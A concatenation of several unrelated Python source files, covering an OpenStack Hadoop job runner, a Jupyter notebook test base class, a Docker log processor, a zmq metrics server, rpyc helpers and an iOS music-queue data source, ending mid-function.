priv_ipv4_list=[os_server.private_ipv4 for os_server in os_server_list],
pub_ipv4_list=[os_server.public_ipv4 for os_server in os_server_list])
fabfile.set_input_filename(abs_file_path=job.file_input.path)
fabfile.set_mapred_job_filename(abs_file_path=job.mapred_job.path)
fabfile.set_mapred_job_impl_class(fq_class_name=job.fully_qualified_job_impl_class)
fabfile.set_output_path(output_path=job.output_path())
#configure, process job and download results from guest
fabfile.start(timer)
#attach output_file to job model
full_output_file_name = '{0}/{1}'.format(job.output_path(),
fabfile.get_output_file_name())
full_output_cloned_file_name = full_output_file_name + '-clone'
os.rename(full_output_file_name, full_output_cloned_file_name)
with open(full_output_cloned_file_name) as f:
output_file = File(f)
job.file_output.save(name=fabfile.get_output_file_name(),
content=output_file)
os.remove(full_output_cloned_file_name)
finally:
#stop and clean
#delete keypair and servers from openstack
timer.cleanupstart = time.time()
fabfile.stop()
fabfile.delete_keypair()
compute.delete_keypair(api_token, compute_url, keypair['key_name'])
compute.delete_servers(api_token, compute_url, server_id_list)
#erase files from controller node
timer.processingend = time.time()
#print processing times
print '\n###################################'
print '## user: {0} ## job: {1:5d}'.format(request.user.username, job.id)
print '###################################'
print '## deploying time # {0:>4.1f} s'.format(timer.hadoopwfconfstart - timer.deploystart)
print '## configuring time # {0:>4.1f} s'.format(timer.hadoopmapredstart - timer.hadoopwfconfstart)
print '## mapreducing time # {0:>4.1f} s'.format(timer.hadoopmapredend - timer.hadoopmapredstart)
print '## cleaning up time # {0:>4.1f} s'.format(timer.processingend - timer.cleanupstart)
print '###################################'
print '## total running time # {0:>.1f} s'.format(timer.processingend - timer.deploystart)
print '###################################\n'
#################################################################################
def run_mapred_job(request, job, job_form, media_root):
Process(target=_execute, args=[request,job,job_form, media_root]).start()
#_execute(request,job,job_form,media_root)
|
launchnotebook.py
|
"""Base class for notebook tests."""
from __future__ import print_function
from binascii import hexlify
from contextlib import contextmanager
import errno
import os
import sys
from threading import Thread, Event
import time
from unittest import TestCase
pjoin = os.path.join
from unittest.mock import patch
import requests
from tornado.ioloop import IOLoop
import zmq
import jupyter_core.paths
from traitlets.config import Config
from ..notebookapp import NotebookApp
from ..utils import url_path_join
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
This create some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
url_prefix = '/a%40b/'
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = cls.base_url() + 'api/contents'
for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if not cls.notebook_thread.is_alive():
raise RuntimeError("The notebook server failed to start")
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def auth_headers(cls):
headers = {}
if cls.token:
headers['Authorization'] = 'token %s' % cls.token
return headers
@classmethod
def request(cls, verb, path, **kwargs):
"""Send a request to my server
with authentication and everything.
"""
headers = kwargs.setdefault('headers', {})
headers.update(cls.auth_headers())
response = requests.request(verb,
url_path_join(cls.base_url(), path),
**kwargs)
return response
@classmethod
def get_patch_env(cls):
return {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR' : cls.config_dir,
'JUPYTER_DATA_DIR' : cls.data_dir,
'JUPYTER_RUNTIME_DIR': cls.runtime_dir,
}
@classmethod
def get_argv(cls):
return []
@classmethod
def setup_class(cls):
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
data_dir = cls.data_dir = tmp('data')
config_dir = cls.config_dir = tmp('config')
runtime_dir = cls.runtime_dir = tmp('runtime')
cls.notebook_dir = tmp('notebooks')
cls.env_patch = patch.dict('os.environ', cls.get_patch_env())
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
def start_thread():
if 'asyncio' in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda : None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=cls.get_argv())
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.env_patch.stop()
cls.path_patch.stop()
cls.tmp_dir.cleanup()
# cleanup global zmq Context, to ensure we aren't leaving dangling sockets
def cleanup_zmq():
zmq.Context.instance().term()
t = Thread(target=cleanup_zmq)
t.daemon = True
t.start()
t.join(5) # give it a few seconds to clean up (this should be immediate)
# if term never returned, there's zmq stuff still open somewhere, so shout about it.
if t.is_alive():
raise RuntimeError("Failed to teardown zmq Context, open sockets likely left lying around.")
@classmethod
def base_url(cls):
return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status"
|
docker_log_processor.py
|
#!/usr/bin/env python
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
#
# filename: docker_log_processor.py
# author: v-greach@microsoft.com
# created: 01/29/2019
from multiprocessing import Process, Queue, Event
from threading import Thread
from datetime import datetime, timedelta
import docker
import time
import argparse
import sys
class DockerLogProcessor:
def __init__(self, container_names, options=""):
run_static = False
if options:
if "-staticfile" in options:
run_static = True
self.process_static_log(options)
if run_static == False:
self.queue = Queue()
self.logger_thread = Thread(target = self.process_queue)
self.logger_thread.start()
self.watcher_processes = []
for container_name in container_names:
print("Getting Log for: " + container_name)
new_process = Process(target = DockerLogProcessor.get_log_from_container, args=(container_name, self.queue, options))
new_process.start()
self.watcher_processes.append(new_process)
@classmethod
def format_date_and_time(self, date_in="", time_format="%Y-%m-%d %H:%M:%S.%f"):
"""
Formats a sting into a datetime type.
string comes in, if it's empty, set it to NOW,
then using the format, convert the string to datetime type.
Parameters
----------
date_in : string
String to convert - call be null
time_format : string
format of string for datetime conversion
Returns
-------
datetime
converted input string or NOW() if empty
"""
date_out =""
if not date_in:
date_out = datetime.strftime(datetime.now(), time_format)
return date_out
date_in = date_in.replace('T', ' ')
if len(date_in) > 26:
date_in = date_in[:26]
date_out = datetime.strptime(date_in, time_format)
return date_out
@staticmethod
def get_log_from_container(container_name, queue, options):
"""
Gets log info from the Docker container.
Parameters
----------
container_name : string
Name of the Docker container
queue : object
queue to stuff the log object in
options : string
Options - basically the argv passed to the class
"""
client = docker.from_env()
container = client.containers.get(container_name)
for log_line in container.logs(stream=True, tail=0, follow=True, timestamps=True):
try:
log_line = log_line.decode('utf8').strip()
log_line_parts = log_line.split("Z ")
log_line_object = LogLineObject(DockerLogProcessor.format_date_and_time(log_line_parts[0]), container_name, log_line_parts[1])
queue.put(log_line_object)
except Exception as e:
write_err("Exception getting container log_line from: " + container_name)
self.write_err(e)
def split(self, string, delimiters):
"""
Split a string with multiple delimiters.
"""
import re
regexPattern = '|'.join(map(re.escape, delimiters))
return re.split(regexPattern, string)
def write_err(self, msg):
"""
write a string to stdout and stderr.
"""
print(msg, file=sys.stderr)
print(msg)
def get_timestamp_delta(self, date_one, date_two, line_count = 0, line_mod = 100):
"""
Diff date_one and date_two then format string for readability.
Delta of the strings are slammed into submission by fields.
line_count can be used to print a full timestamp every line_mod lines
"""
if line_mod != 0 and line_count % line_mod == 0:
return date_one
time_delta_str = ""
delimiters = ('.', '-', ' ', ':')
field_count = 0
all_fields_one = self.split(date_one, delimiters)
all_fields_two = self.split(date_two, delimiters)
for field1 in all_fields_one:
if field1 == all_fields_two[field_count]:
for _ in field1:
time_delta_str += " "
else:
time_delta_str += all_fields_one[field_count]
if field_count < 2:
time_delta_str += "-"
elif field_count == 2:
time_delta_str += " "
elif field_count > 2 and field_count < 5 :
time_delta_str += ":"
elif field_count == 5 :
time_delta_str += "."
field_count += 1
return time_delta_str
def process_static_log(self, options):
"""
Got some static logs - set 'em up for processing.
Static log(s) specified.
parse the options with argparse.
get a list of string of filenames to proceas,
get the output filename,
get json filters.
read all log files and format each line
sort and push to output
"""
write_log_filename = "logsbytime.log"
split_str = ' ' + u"\u2588" + ' '
loglines = []
max_name_len = 0
filter_json_file = ""
filter_list = ""
pytest_owner = ""
parser = argparse.ArgumentParser(description="Docker Log Processor")
parser.add_argument('-outputfile', nargs=1, help="filename to write output")
parser.add_argument('-staticfile', nargs='+', help="filename to read from")
parser.add_argument('-filterfile', nargs=1, help="filename of json filters")
arguments = parser.parse_args(options.split(' '))
import os
dir_name = os.path.dirname(os.path.abspath(__file__))
out_filenames = arguments.outputfile
if len(out_filenames) > 1:
self.write_err("ERR: Too many -outfiles")
return
else:
out_filename = out_filenames[0]
out_filename = out_filename.strip()
write_log_filename = os.path.basename(out_filename)
import json
filter_filenames = arguments.filterfile
if len(filter_filenames) > 1:
self.write_err("ERR: Too many -filterfile")
return
else:
filter_filename = filter_filenames[0]
filter_json_file = filter_filename.strip()
full_filter_path = os.path.join(os.sep, dir_name, filter_json_file)
try:
filter_json = open(full_filter_path, encoding="utf8").read()
if filter_json:
json_data = json.loads(filter_json)
filter_list = json_data['filters']
except Exception as e:
self.write_err("Exception processing JSON file: " + full_filter_path)
self.write_err(e)
return
static_filenames = arguments.staticfile
# find the max_name_len of every staticfile filename
for static_filename in static_filenames:
if static_filename:
static_filename = static_filename.strip()
base_filename = os.path.basename(static_filename)
name_len = len(base_filename)
if name_len > max_name_len:
max_name_len = name_len
for static_filename in static_filenames:
if static_filename:
static_filename = static_filename.strip()
base_filename = os.path.basename(static_filename)
module_name = base_filename
# Pad the filename so that each is the same length
for _ in range(len(base_filename), max_name_len):
module_name += ' '
full_log_path = os.path.join(os.sep, dir_name, static_filename)
try:
read_file = open(full_log_path, encoding="utf8").read().split("\n")
except Exception as e:
self.write_err("Exception opening LOG file: " + full_log_path )
self.write_err(e)
# Get and filter each line
for log_line in read_file:
ok_to_log = True
if log_line:
if "PYTEST" in log_line:
if not pytest_owner:
pytest_owner = base_filename
else:
if pytest_owner != base_filename:
ok_to_log = False
if ok_to_log:
for filter in filter_list:
if filter in log_line:
ok_to_log = False
if ok_to_log:
# Made it past filters and BuinessLogic, LOG IT
log_line_parts = log_line.split("Z ")
if log_line_parts:
log_data = ""
num_parts = len(log_line_parts)
# Handle case where more than one timestamp
if num_parts > 2:
for part in range(1, num_parts):
log_data += log_line_parts[part] + ' '
else:
log_data = log_line_parts[1]
log_time = DockerLogProcessor.format_date_and_time(log_line_parts[0], "%Y-%m-%d %H:%M:%S.%f")
log_line_object = LogLineObject(log_time, module_name, log_data)
loglines.append(log_line_object)
loglines.sort(key=lambda x: x.timestamp)
last_timestamp = datetime.now() + timedelta(days=-364)
line_count = 0
#Done processing and sorted, now display and write results
write_log_filename = os.path.join(os.sep, dir_name, write_log_filename)
with open(write_log_filename,'w', encoding="utf-8") as outfile:
for log_line in loglines:
logline_timestamp = log_line.timestamp
date_delta = self.get_timestamp_delta(str(logline_timestamp), str(last_timestamp), line_count)
line_count += 1
out_line = log_line.module_name + " : " + date_delta + split_str + log_line.log_data
print(out_line)
outfile.write("{}\n".format(out_line))
last_timestamp = logline_timestamp
def process_queue(self):
"""
Process the line objects in the queue, and print as formatted.
"""
last_timestamp = datetime.now() + timedelta(days=-364)
line_count = 0
while True:
log_line = self.queue.get()
logline_timestamp = log_line.timestamp
date_delta = self.get_timestamp_delta(str(logline_timestamp), str(last_timestamp), line_count)
line_count += 1
print(log_line.module_name + " : " + date_delta + " : " + log_line.log_data)
last_timestamp = logline_timestamp
class LogLineObject:
def __init__ (self, timestamp, module_name='', log_data=''):
self.timestamp = timestamp
self.module_name = module_name
self.log_data = log_data
if __name__ == "__main__":
log_processor = DockerLogProcessor([], " ".join(sys.argv[1:]))
|
neptune_mp_server.py
|
import zmq
import json
import StringIO
from time import time, sleep
import numpy as np
import os
from tensorpack.utils.neptune_utils import Neptune, NeptuneContextWrapper, JobWrapper, ChannelWrapper
import traceback
neptune = Neptune()
class Server(object):
def __init__(self, number_of_workers, port, debug_charts, adam_debug, schedule_hyper, experiment_dir):
self.port = port
self.debug_charts = debug_charts
self.adam_debug = adam_debug
self.schedule_hyper = schedule_hyper
self.neptune_ctx = NeptuneContextWrapper(experiment_dir)
job = self.neptune_ctx.job
self.workers_set = set()
def create_channel(name, channel_type=neptune.ChannelType.NUMERIC):
return job.create_channel(name=name, channel_type=channel_type)
def create_per_worker_channels_and_chart(name):
channels = [create_channel('{}_{}'.format(name, i)) for i in range(number_of_workers)]
job.create_chart(
name=name,
series={
'{}_{}'.format(name, i) : channel for i, channel in enumerate(channels)
})
return channels
self.score_mean_channel = create_channel('score_mean')
self.score_max_channel = create_channel('score_max')
self.online_score_channel = create_channel('online_score')
job.create_chart(
name='score',
series={
'score_mean' : self.score_mean_channel,
'score_max' : self.score_max_channel,
'online_score' : self.online_score_channel
})
self.cost_channel = create_channel('cost')
self.policy_loss_channel = create_channel('policy_loss')
self.xentropy_loss_channel = create_channel('xentropy_loss')
self.max_logit_channel = create_channel('max_logit')
self.value_loss_channel = create_channel('value_loss')
self.advantage_channel = create_channel('advantage')
self.pred_reward_channel = create_channel('pred_reward')
job.create_chart(
name='loss',
series= {
'cost' : self.cost_channel,
'policy_loss' : self.policy_loss_channel,
'xentropy_loss' : self.xentropy_loss_channel,
'value_loss' : self.value_loss_channel,
'advantage' : self.advantage_channel,
'pred_reward' : self.pred_reward_channel,
'max_logit' : self.max_logit_channel
})
self.active_workes_channel = create_channel('active_workers')
self.dp_per_s_channel = create_channel('dp_per_s')
job.create_chart(
name='other',
series={
'active_workers' : self.active_workes_channel,
'datapoints/s' : self.dp_per_s_channel
})
self.active_relus_channel = create_channel('active_relus')
job.create_chart(
name='active relus',
series={
'active_relus' : self.active_relus_channel
})
self.max_delay_channel = create_channel('max_delay')
self.mean_delay_channel = create_channel('mean_delay')
self.min_delay_channel = create_channel('min_delay')
job.create_chart(
name='delay',
series={
'max_delay' : self.max_delay_channel,
'mean_delay' : self.mean_delay_channel,
'min_delay' : self.min_delay_channel
})
if self.adam_debug:
self.adam_m_norm_channel = create_channel('adam_m_norm')
self.adam_v_norm_channel = create_channel('adam_v_norm')
self.adam_update_norm_channel = create_channel('adam_update_norm')
self.adam_lr_channel = create_channel('adam_lr')
job.create_chart(
name='adam_state',
series={
'm_norm' : self.adam_m_norm_channel,
'v_norm' : self.adam_v_norm_channel,
'update_norm' : self.adam_update_norm_channel,
'lr' : self.adam_lr_channel
})
if self.schedule_hyper:
self.learning_rate_channel = create_channel('learning_rate')
self.entropy_beta_channel = create_channel('entropy_beta')
job.create_chart(
name='scheduled hyperparams',
series={
'learning rate' : self.learning_rate_channel,
'entropy beta' : self.entropy_beta_channel
})
if not self.debug_charts:
self.start_time = time()
return
self.grad_norm_before_clip_channel = create_channel('grad_norm_before_clip')
self.grad_norm_after_clip_channel = create_channel('grad_norm_after_clip')
job.create_chart(
name='gradients',
series={
'grad_norm_before_clip' : self.grad_norm_before_clip_channel,
'grad_norm_after_clip' : self.grad_norm_after_clip_channel
})
self.cost_channels = create_per_worker_channels_and_chart('cost')
self.xentropy_loss_channels = create_per_worker_channels_and_chart('xentropy_loss')
self.value_loss_channels = create_per_worker_channels_and_chart('value_loss')
self.policy_loss_channels = create_per_worker_channels_and_chart('policy_loss')
self.mean_value_channels = create_per_worker_channels_and_chart('mean_value')
self.mean_state_channels = create_per_worker_channels_and_chart('mean_state')
self.mean_action_channels = create_per_worker_channels_and_chart('mean_action')
self.mean_future_reward_channels = create_per_worker_channels_and_chart('mean_futurereward')
self.mean_init_R_channels = create_per_worker_channels_and_chart('mean_init_R')
self.games_over_channels = create_per_worker_channels_and_chart('games_over')
self.fc_value_channels = create_per_worker_channels_and_chart('fc_value')
self.fc_fc0_channels = create_per_worker_channels_and_chart('fc_fc0')
self.conv0_out_channels = create_per_worker_channels_and_chart('conv0_out')
self.conv1_out_channels = create_per_worker_channels_and_chart('conv1_out')
self.conv2_out_channels = create_per_worker_channels_and_chart('conv2_out')
self.conv3_out_channels = create_per_worker_channels_and_chart('conv3_out')
self.fc1_0_out_channels = create_per_worker_channels_and_chart('fc1_0_out')
self.fc_pi_out_channels = create_per_worker_channels_and_chart('fc_pi_out')
self.fc_v_out_channels = create_per_worker_channels_and_chart('fc_v_out')
self.start_time = time()
def _get_hours_since_start(self):
return (time() - self.start_time) / (60. * 60.)
def _get_minutes_since(self, t):
return (time() - t) / 60.
def _send_per_worker_loss(self, x, id, content):
# original x may not be strictly increasing
x = self._get_hours_since_start()
self.cost_channels[id].send(x, content[1])
self.policy_loss_channels[id].send(x, content[2])
self.xentropy_loss_channels[id].send(x, content[3])
self.value_loss_channels[id].send(x, content[4])
def _dump_to_channels(self, id, content):
x = self._get_hours_since_start()
self.workers_set.add(id) # add this worker to active workers
if content[0] == 'score':
if len(content) == 4:
x = content[3]
self.score_mean_channel.send(x, content[1])
self.score_max_channel.send(x, content[2])
elif content[0] == 'loss':
self.cost_channel.send(x, content[1])
self.policy_loss_channel.send(x, content[2])
self.xentropy_loss_channel.send(x, content[3])
self.value_loss_channel.send(x, content[4])
self.advantage_channel.send(x, content[5])
self.pred_reward_channel.send(x, content[6])
self.max_logit_channel.send(x, content[7])
if self.debug_charts:
self._send_per_worker_loss(x, id, content)
elif content[0] == 'online':
self.online_score_channel.send(x, content[1])
elif content[0] == 'other':
self.active_relus_channel.send(x, content[1])
self.dp_per_s_channel.send(x, content[2])
elif content[0] == 'delays':
self.mean_delay_channel.send(x, content[1][0])
self.max_delay_channel.send(x, content[1][1])
self.min_delay_channel.send(x, content[1][2])
if self.adam_debug and content[0] == 'adam':
self.adam_m_norm_channel.send(x, content[1])
self.adam_v_norm_channel.send(x, content[2])
self.adam_update_norm_channel.send(x, content[3])
self.adam_lr_channel.send(x, content[4])
if self.schedule_hyper and content[0] == 'schedule':
self.learning_rate_channel.send(x, content[1])
self.entropy_beta_channel.send(x, content[2])
if not self.debug_charts:
return
if content[0] == 'grad':
self.grad_norm_before_clip_channel.send(x, content[1])
self.grad_norm_after_clip_channel.send(x, content[2])
elif content[0] == 'other':
self.fc_fc0_channels[id].send(content[4], content[3])
self.fc_value_channels[id].send(content[4], content[5])
elif content[0] == 'env_state':
x = self._get_hours_since_start()
self.mean_state_channels[id].send(x, content[1])
self.mean_future_reward_channels[id].send(x, content[2])
self.mean_value_channels[id].send(x, content[3])
self.mean_init_R_channels[id].send(x, content[4])
self.mean_action_channels[id].send(x, content[5])
self.games_over_channels[id].send(x, content[6])
#self.mean_state_channel.send(x, content[1])
elif content[0] == 'layers':
self.conv0_out_channels[id].send(x, content[1])
self.conv1_out_channels[id].send(x, content[2])
self.conv2_out_channels[id].send(x, content[3])
self.conv3_out_channels[id].send(x, content[4])
self.fc1_0_out_channels[id].send(x, content[5])
self.fc_pi_out_channels[id].send(x, content[6])
self.fc_v_out_channels[id].send(x, content[7])
def main_loop(self):
print 'server main loop'
context = zmq.Context()
socket = context.socket(zmq.REP)
hostname = os.environ['SLURMD_NODENAME']
address = "tcp://*:{}".format(self.port)
print 'before socket bind... {}'.format(address)
socket.bind(address)
last_workers_check = time()
while True:
try:
print 'receiving'
message = socket.recv()
# just a trash message to reset the socket
socket.send('ACK')
id, content = json.loads(message)
self._dump_to_channels(id, content)
print content
# every 1 minutes count number of workers that server got any message from
# in last 1 minutes and sends it to neptune
if self._get_minutes_since(last_workers_check) > 1:
x = self._get_hours_since_start()
self.active_workes_channel.send(x, len(self.workers_set))
self.workers_set.clear()
last_workers_check = time()
except Exception as e:
print '======= EXCEPTION IN MP SERVER MAIN LOOP ======='
print e.message
traceback.print_exc()
break
socket.close()
class Client(object):
def __init__(self, server_host, server_port):
self.server_port = server_port
self.server_host = server_host
def send(self, message):
sio = StringIO.StringIO()
json.dump(message, sio)
context = zmq.Context()
socket = context.socket(zmq.REQ)
address = "tcp://{host}:{port}".format(host=self.server_host, port=self.server_port)
print "sending to address {}".format(address)
socket.connect(address)
socket.send(sio.getvalue())
socket.close()
if __name__ == '__main__':
number_of_workers = 5
import multiprocessing as mp
def dummy_client(id):
np.random.seed(id)
c = Client(server_host='localhost')
v = [0,0]
while True:
print 'sending...'
v[0] += np.random.random()
v[1] += np.random.random() * 2
message = (id, v)
c.send(message)
sleep(1)
for i in range(number_of_workers):
dummy = mp.Process(target=dummy_client, args=[i])
dummy.start()
server = Server(number_of_workers=number_of_workers)
server.main_loop()
|
__init__.py
|
"""
A library of various helpers functions and classes
"""
import inspect
import sys
import socket
import logging
import threading
import time
import random
from rpyc.lib.compat import maxint # noqa: F401
class MissingModule(object):
__slots__ = ["__name"]
def __init__(self, name):
self.__name = name
def __getattr__(self, name):
if name.startswith("__"): # issue 71
raise AttributeError("module %r not found" % (self.__name,))
raise ImportError("module %r not found" % (self.__name,))
def __bool__(self):
return False
__nonzero__ = __bool__
def safe_import(name):
try:
mod = __import__(name, None, None, "*")
except ImportError:
mod = MissingModule(name)
except Exception:
# issue 72: IronPython on Mono
if sys.platform == "cli" and name == "signal": # os.name == "posix":
mod = MissingModule(name)
else:
raise
return mod
def setup_logger(quiet=False, logfile=None):
opts = {}
if quiet:
opts['level'] = logging.ERROR
else:
opts['level'] = logging.DEBUG
if logfile:
opts['filename'] = logfile
logging.basicConfig(**opts)
class hybridmethod(object):
"""Decorator for hybrid instance/class methods that will act like a normal
method if accessed via an instance, but act like classmethod if accessed
via the class."""
def __init__(self, func):
self.func = func
def __get__(self, obj, cls):
return self.func.__get__(cls if obj is None else obj, obj)
def __set__(self, obj, val):
raise AttributeError("Cannot overwrite method")
def spawn(*args, **kwargs):
"""Start and return daemon thread. ``spawn(func, *args, **kwargs)``."""
func, args = args[0], args[1:]
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def spawn_waitready(init, main):
"""
Start a thread that runs ``init`` and then ``main``. Wait for ``init`` to
be finished before returning.
Returns a tuple ``(thread, init_result)``.
"""
event = threading.Event()
stack = [event] # used to exchange arguments with thread, so `event`
# can be deleted when it has fulfilled its purpose.
def start():
stack.append(init())
stack.pop(0).set()
return main()
thread = spawn(start)
event.wait()
return thread, stack.pop()
class Timeout:
def __init__(self, timeout):
if isinstance(timeout, Timeout):
self.finite = timeout.finite
self.tmax = timeout.tmax
else:
self.finite = timeout is not None and timeout >= 0
self.tmax = time.time() + timeout if self.finite else None
def expired(self):
return self.finite and time.time() >= self.tmax
def timeleft(self):
return max((0, self.tmax - time.time())) if self.finite else None
def sleep(self, interval):
time.sleep(min(interval, self.timeleft()) if self.finite else interval)
def socket_backoff_connect(family, socktype, proto, addr, timeout, attempts):
"""connect will backoff if the response is not ready for a pseudo random number greater than zero and less than
51e-6, 153e-6, 358e-6, 768e-6, 1587e-6, 3225e-6, 6502e-6, 13056e-6, 26163e-6, 52377e-6
this should help avoid congestion.
"""
sock = socket.socket(family, socktype, proto)
collision = 0
connecting = True
while connecting:
collision += 1
try:
sock.settimeout(timeout)
sock.connect(addr)
connecting = False
except socket.timeout:
if collision == attempts or attempts < 1:
raise
else:
sock.close()
sock = socket.socket(family, socktype, proto)
time.sleep(exp_backoff(collision))
return sock
def exp_backoff(collision):
""" Exponential backoff algorithm from
Peterson, L.L., and Davie, B.S. Computer Networks: a systems approach. 5th ed. pp. 127
"""
n = min(collision, 10)
supremum_adjustment = 1 if n > 3 else 0
k = random.uniform(0, 2**n - supremum_adjustment)
return k * 0.0000512
def get_id_pack(obj):
"""introspects the given "local" object, returns id_pack as expected by BaseNetref
The given object is "local" in the sense that it is from the local cache. Any object in the local cache exists
in the current address space or is a netref. A netref in the local cache could be from a chained-connection.
To handle type related behavior properly, the attribute `__class__` is a descriptor for netrefs.
So, check thy assumptions regarding the given object when creating `id_pack`.
"""
if hasattr(obj, '____id_pack__'):
# netrefs are handled first since __class__ is a descriptor
return obj.____id_pack__
elif inspect.ismodule(obj) or getattr(obj, '__name__', None) == 'module':
# TODO: not sure about this, need to enumerate cases in units
if isinstance(obj, type): # module
obj_cls = type(obj)
name_pack = '{0}.{1}'.format(obj_cls.__module__, obj_cls.__name__)
return (name_pack, id(type(obj)), id(obj))
else:
if inspect.ismodule(obj) and obj.__name__ != 'module':
if obj.__name__ in sys.modules:
name_pack = obj.__name__
else:
name_pack = '{0}.{1}'.format(obj.__class__.__module__, obj.__name__)
elif inspect.ismodule(obj):
name_pack = '{0}.{1}'.format(obj__module__, obj.__name__)
print(name_pack)
elif hasattr(obj, '__module__'):
name_pack = '{0}.{1}'.format(obj.__module__, obj.__name__)
else:
obj_cls = type(obj)
name_pack = '{0}'.format(obj.__name__)
return (name_pack, id(type(obj)), id(obj))
elif not inspect.isclass(obj):
name_pack = '{0}.{1}'.format(obj.__class__.__module__, obj.__class__.__name__)
return (name_pack, id(type(obj)), id(obj))
else:
name_pack = '{0}.{1}'.format(obj.__module__, obj.__name__)
return (name_pack, id(obj), 0)
def get_methods(obj_attrs, obj):
"""introspects the given (local) object, returning a list of all of its
methods (going up the MRO).
:param obj: any local (not proxy) python object
:returns: a list of ``(method name, docstring)`` tuples of all the methods
of the given object
"""
methods = {}
attrs = {}
if isinstance(obj, type):
# don't forget the darn metaclass
mros = list(reversed(type(obj).__mro__)) + list(reversed(obj.__mro__))
else:
mros = reversed(type(obj).__mro__)
for basecls in mros:
attrs.update(basecls.__dict__)
for name, attr in attrs.items():
if name not in obj_attrs and hasattr(attr, "__call__"):
methods[name] = inspect.getdoc(attr)
return methods.items()
|
mqv_datasource.py
|
import rubicon.objc as objc
import objc_util # pylint: disable=import-error
import threading
import time
from .mqv_song import MQVSong
from .mqv_songchangedetector import MQVSongChangeDetector
_warnForDefinedClass = False
NSLog = objc_util.c.NSLog
NSLog.argtypes = [objc_util.c_void_p]
try:
MQVDataSource = objc.ObjCClass("MQVDataSource")
if _warnForDefinedClass:
print("MQVDataSource already defined")
except NameError:
UITableViewDataSource = objc.ObjCProtocol("UITableViewDataSource")
class MQVDataSource(objc.NSObject, protocols=[UITableViewDataSource]):
@objc.objc_method
def initWithTableView_(self, tableView):
self.musicPlayer = objc.ObjCClass("MPMusicPlayerController").systemMusicPlayer
self.tableView = tableView
self.songList = []
self.isEnumerating = False
self.enumerationLock = threading.Lock()
self.beginEnumeratingSongs()
self.changeDetector = objc.ObjCClass("MQVSongChangeDetector").alloc().init()
self.changeDetector.MQVCallback = self.beginEnumeratingSongs
self.changeDetector.start()
return self
@objc.objc_method
def enumerateSongs(self):
newSongList = []
currentIndex = self.musicPlayer.indexOfNowPlayingItem + 1
maxIndex = self.musicPlayer.numberOfItems()
for index in range(currentIndex, maxIndex):
song = self.musicPlayer.nowPlayingItemAtIndex(index)
if song and "MPModelObjectMediaItem" in song.debugDescription and song.title is None:
break
else:
newSongList.append(objc.ObjCClass("MQVSong").alloc().initWithSong(song))
pass
pass
self.songList = newSongList
self.enumerationLock.release()
self.isEnumerating = False
self.reloadTable()
pass
@objc.objc_method
def beginEnumeratingSongs(self):
self.enumerationLock.acquire(True)
self.isEnumerating = True
self.reloadTable()
threading.Thread(target=self.enumerateSongs).start()
pass
@objc.objc_method
@objc_util.on_main_thread
def reloadTable(self):
self.tableView.reloadData()
if self.tableView.numberOfRowsInSection(0) is not 0:
indexZero = objc.ObjCClass("NSIndexPath").indexPathForRow(0, inSection=0)
self.tableView.scrollToRowAtIndexPath(indexZero, atScrollPosition=1, animated=True)
pass
pass
@objc.objc_method
def tableView_numberOfRowsInSection_(self, tableView, section: int) -> int:
if self.isEnumerating:
return 1
else:
return len(self.songList)
@objc.objc_method
def tableView_cellForRowAtIndexPath_(self, tableView, indexPath):
if self.isEnumerating:
cellIdentifer = "MQVActivityCell"
cell = tableView.dequeueReusableCellWithIdentifier(cellIdentifer)
if cell is None:
